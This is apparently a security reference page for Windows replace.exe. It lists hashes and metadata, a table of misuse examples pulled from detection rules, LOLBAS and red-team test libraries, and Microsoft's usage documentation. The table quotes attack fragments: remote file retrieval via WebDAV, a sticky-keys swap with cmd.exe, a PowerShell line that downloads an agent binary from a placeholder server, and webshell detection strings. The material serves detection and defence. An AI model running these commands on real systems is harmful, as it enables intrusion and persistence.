replace.exe

  • File Path: C:\windows\system32\replace.exe
  • Description: Replace File Utility

Hashes

Type Hash
MD5 0F76F00192C4300413049BFE79491D87
SHA1 012126E22C4DD3A6517B29A2CD9C55C59C03169C
SHA256 753A788019F5A1050ACCB74A21E7029451F41477493C74D1BCC21F2D16A3A85B
SHA384 423F6894DD4F170E98FE88596E0747D7FDEEA12F79CD2A77519CB6D8F42C60C61AE72E99F4D52C3FA601EC5F6ED6629B
SHA512 D9E4266EC0E6E07EBE3DEBDB4BD3776496762AB6738B9D64590CDD43A90F660C7F1297533DE0A0BE21DCF085A109C5FD9B26508EBE3B6C701A2607D10BFA2CFE
SSDEEP 384:5QvkhX6tT4wH6ezNbrfi/QS83l+NL0k4bc1Woh/W:OvkhXST4wzJfit83OkbcB

Signature

  • Status: The file C:\windows\system32\replace.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: REPLACE.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of replace.exe being misused. While replace.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License – | – | – | – sigma | gcp_kubernetes_admission_controller.yml | - replace | DRL 1.0 sigma | cisco_cli_moving_data.yml | - 'configure replace' | DRL 1.0 sigma | posh_ps_susp_wallpaper.yml | title: Replace Desktop Wallpaper by Powershell | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | title: Suspicious Replace.exe Execution | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | description: Replace.exe is used to replace file with another file | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | - https://lolbas-project.github.io/lolbas/Binaries/Replace/ | DRL 1.0 sigma | proc_creation_win_lolbas_replace.yml | - 'replace ' | DRL 1.0 LOLBAS | AcroRd32.yml | - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary | LOLBAS | ROCCAT_Swarm.yml | - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe | LOLBAS | Replace.yml | Name: Replace.exe | LOLBAS | Replace.yml | Description: Used to replace file with another file | LOLBAS | Replace.yml | - Command: replace.exe C:\Source\File.cab C:\Destination /A | LOLBAS | Replace.yml | - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | LOLBAS | Replace.yml | - Path: C:\Windows\System32\replace.exe | LOLBAS | Replace.yml | - Path: C:\Windows\SysWOW64\replace.exe | LOLBAS | Replace.yml | - IOC: Replace.exe retrieving files from remote server | malware-ioc | misp_invisimole.json | "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", | © ESET 2014-2018 malware-ioc | nouns.txt | replace | © ESET 2014-2018 malware-ioc | stantinko | var c = a[b].toLocaleLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 malware-ioc | stantinko | a = a.toLowerCase().replace(/(\n)/g, " ").replace(/(\r)/g, ""); | © ESET 2014-2018 malware-ioc | misp-turla-outlook-event.json | "description": "The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.[[Citation: Microsoft Component Object Model]] Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[[Citation: GDATA COM Hijacking]] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.\n\nDetection: There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\<\/code> may be anomalous and should be investigated since user objects will be loaded prior to machine objects in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\<\/code>.[[Citation: Endgame COM Hijacking]] Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.\n\nPlatforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10\n\nData Sources: Windows Registry, DLL monitoring, Loaded DLLs\n\nContributors: ENDGAME", | © ESET 2014-2018 malware-ioc | windigo | replace: | © ESET 2014-2018 atomic-red-team | problem_report.md | ℹ Please replace this with what you did. | MIT License. © 2018 Red Canary atomic-red-team | problem_report.md | ℹ Please replace this with what you expected to happen. | MIT License. © 2018 Red Canary atomic-red-team | problem_report.md | ℹ Please replace this with of what happened instead. | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary atomic-red-team | linux-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | macos-index.md | - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] | MIT License. © 2018 Red Canary atomic-red-team | windows-index.md | - Atomic Test #2: Replace binary of sticky keys [windows] | MIT License. © 2018 Red Canary atomic-red-team | windows-index.md | - Atomic Test #1: Replace Desktop Wallpaper [windows] | MIT License. © 2018 Red Canary atomic-red-team | T1003.md | $cleanupUpdatedValue = $cleanupUpdatedValue -replace ‘,NPPSpy’,’’ | MIT License. © 2018 Red Canary atomic-red-team | T1053.003.md | - Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary atomic-red-team | T1053.003.md | ## Atomic Test #1 - Cron - Replace crontab with referenced file | MIT License. © 2018 Red Canary atomic-red-team | T1070.006.md | | target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00| | MIT License. © 2018 Red Canary atomic-red-team | T1098.md | $account = $member.Name -replace “.+\",”” # strip computername\ | MIT License. © 2018 Red Canary atomic-red-team | src | - If Excel asks “A file name ‘…’ already exists in this location. Do you want to replace it?”, click Yes. | MIT License. © 2018 Red Canary atomic-red-team | T1204.002.md | $macroCode = $macroCode -replace ‘serverPath’, $URL -replace ‘fileName’, “#{file_name}” | MIT License. © 2018 Red Canary atomic-red-team | T1221.md | <blockquote>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) | MIT License. © 2018 Red Canary atomic-red-team | T1491.001.md | - Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary atomic-red-team | T1491.001.md | ## Atomic Test #1 - Replace Desktop Wallpaper | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | - Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | ## Atomic Test #2 - Replace binary of sticky keys | MIT License. © 2018 Red Canary atomic-red-team | T1546.008.md | Replace sticky keys binary (sethc.exe) with cmd.exe | MIT License. © 2018 Red Canary atomic-red-team | T1546.015.md | Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote> | MIT License. © 2018 Red Canary atomic-red-team | T1547.009.md | Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</blockquote> | MIT License. © 2018 Red Canary atomic-red-team | T1558.001.md | “@ -Replace “DOMAIN_SID”, $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary atomic-red-team | T1558.001.md | “@ -Replace “kirbifile”, $filename | Out-File -Encoding OEM $env:TEMP\golden.bat | MIT License. © 2018 Red Canary atomic-red-team | T1564.md | $macro = $macro -replace “aREPLACEMEa”, “PathToAtomicsFolder\T1564\bin\extractme.bin” | MIT License. © 2018 Red Canary atomic-red-team | T1574.001.md | If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</blockquote> | MIT License. © 2018 Red Canary signature-base | [apt_apt29grizzly_steppe.yar](https://github.com/Neo23x0/signature-base/blob/master/yara/apt_apt29_grizzly_steppe.yar) | $s2 = “Repeat last find command)Replace specific text with different text” fullword wide | CC BY-NC 4.0 signature-base | apt_hafnium.yar | $s3 = “Encoding.UTF8.GetString(FromBase64String(str.Replace(“ ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “Get-Content $env:Public\Libraries\update.vbs) -replace” ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x3 = “CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-","bat")” fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $s4 = “’) -replace ‘’,(‘DNS’+$id) | “ fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $s7 = “’) -replace ‘’,(‘HTP’+$id) | “ fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘_’,(Get-Random) | Set-C” ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $x1 = “(Get-Content $env:Public\Libraries\dns.ps1) -replace (‘#’+’##’),$botid | Set-Content $env:Public\Libraries\dns.ps1” fullword ascii | CC BY-NC 4.0 signature-base | apt_oilrig.yar | $one5 = “cu = Replace(cu, "$", "")” ascii wide | CC BY-NC 4.0 signature-base | apt_winnti_hdroot.yar | $s8 = “tera replace dll config” fullword ascii | CC BY-NC 4.0 signature-base | cn_pentestset_webshells.yar | $s2 = “strReturn=Replace(strReturn,chr(43),"%2B") ‘JMDCW” fullword ascii | CC BY-NC 4.0 signature-base | crime_emotet.yar | note = “The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation.” | CC BY-NC 4.0 signature-base | crime_goldeneye.yar | $x1 = “fso.GetTempName();tmp_path = tmp_path.replace(‘.tmp’, ‘.exe’)” fullword ascii | CC BY-NC 4.0 signature-base | gen_cert_payloads.yar | $fp1 = “replace it with the PEM-encoded root certificate” | CC BY-NC 4.0 signature-base | gen_fireeye_redteam_tools.yar | $s2 = “[1].replace(‘unsigned char buf[] = "’” | CC BY-NC 4.0 signature-base | gen_invoke_thehash.yar | $s1 = “$process_ID = $process_ID -replace "-00-00",""” fullword ascii | CC BY-NC 4.0 signature-base | gen_mimikatz.yar | $x9 = “\ Password replace ->” fullword wide ascii | CC BY-NC 4.0 signature-base | gen_powershell_empire.yar | $s3 = “$PersistantScript = $PersistantScript.ToString().Replace(‘EXECUTEFUNCTION’, "$PersistenceScriptName -Persist")” fullword ascii | CC BY-NC 4.0 signature-base | gen_susp_js_obfuscatorio.yar | $c4 = “)‘replace’;var” | CC BY-NC 4.0 signature-base | gen_webshells.yar | $gen_bit_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $m_multi_one1 = “Replace(“ wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $m_multi_four2 = “.Replace(“ wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $oo2 = “/").Replace("/” wide ascii | CC BY-NC 4.0 signature-base | gen_webshells.yar | $asp_gen_sus2 = /.replace(\/\w\/g/ nocase wide ascii | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “MorfiCoder=Replace(Replace(StrReverse(Code),"//",""""),"\*\",vbCrlf)” fullword | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s4 = “echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s8 = “theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s9 = “theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s3 = “If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "
")” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s7 = “theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")” | CC BY-NC 4.0 signature-base | thor-webshells.yar | $s8 = “Obviously you replace the ip address with that of the target.” | CC BY-NC 4.0 stockpile | 3734aa1e-c536-42b3-8912-4c91b8bdce90.yml | ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("””,””)){:.highlight .language-yaml} | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) [stockpile](https://github.com/mitre/stockpile) | [52771610-2322-44cf-816b-a7df42b4c086.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml) | name: Replace a service binary with alternate binary{:.highlight .language-yaml} | [Apache-2.0](https://github.com/mitre/stockpile/blob/master/LICENSE) [stockpile](https://github.com/mitre/stockpile) | [e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml](https://github.com/mitre/stockpile/blob/master/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml) | $url=”#{server}/file/download”; $wc=New-Object System.Net.WebClient; $wc.Headers.add(“platform”,”windows”); $wc.Headers.add(“file”,”sandcat.go”); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[“Content-Disposition”].Substring($wc.ResponseHeaders[“Content-Disposition”].IndexOf(“filename=”)+9).Replace(“"",""); [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data); | Apache-2.0 stockpile | e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml | $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("””,””);`{:.highlight .language-yaml} | Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


replace

Replace existing files in a directory. If used with the /a option, this command adds new files to a directory instead of replacing existing files.

Syntax

replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/a] [/p] [/r] [/w]
replace [<drive1>:][<path1>]<filename> [<drive2>:][<path2>] [/p] [/r] [/s] [/w] [/u]

Parameters

Parameter Description
[<drive1>:][<path1>]<filename> Specifies the location and name of the source file or set of files. The filename option is required, and can include wildcard characters (* and ?).
[<drive2>:][<path2>] Specifies the location of the destination file. You can’t specify a file name for files you replace. If you don’t specify a drive or path, this command uses the current drive and directory as the destination.
/a Adds new files to the destination directory instead of replacing existing files. You can’t use this command-line option with the /s or /u command-line option.
/p Prompts you for confirmation before replacing a destination file or adding a source file.
/r Replaces Read-only and unprotected files. If you attempt to replace a Read-only file, but you don’t specify /r, an error results and stops the replacement operation.
/w Waits for you to insert a disk before the search for source files begins. If you don’t specify /w, this command begins replacing or adding files immediately after you press ENTER.
/s Searches all subdirectories in the destination directory and replaces matching files. You can’t use /s with the /a command-line option. The command doesn’t search subdirectories that are specified in Path1.
/u Replaces only those files on the destination directory that are older than those in the source directory. You can’t use /u with the /a command-line option.
/? Displays help at the command prompt.
Remarks
  • As this command adds or replaces files, the file names appear on the screen. After this command is done, a summary line is displayed in one of the following formats:

    nnn files added
    nnn files replaced
    no file added
    no file replaced
    
  • If you’re using floppy disks and you need to switch disks while running this command, you can specify the /w command-line option so that this command waits for you to switch the disks.

  • You can’t use this command to update hidden files or system files.

  • The following table shows each exit code and a brief description of its meaning:

    Exit code Description
    0 This command successfully replaced or added the files.
    1 This command encountered an incorrect version of MS-DOS.
    2 This command couldn’t find the source files.
    3 This command couldn’t find the source or destination path.
    5 The user doesn’t have access to the files that you want to replace.
    8 There is insufficient system memory to carry out the command.
    11 The user used the wrong syntax on the command line.

[!NOTE] You can use the ERRORLEVEL parameter on the if command line in a batch program to process exit codes that are returned by this command.

Examples

To update all the versions of a file named Phones.cli (which appear in multiple directories on drive C:), with the latest version of the Phones.cli file from a floppy disk in drive A:, type:

replace a:\phones.cli c:\ /s

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.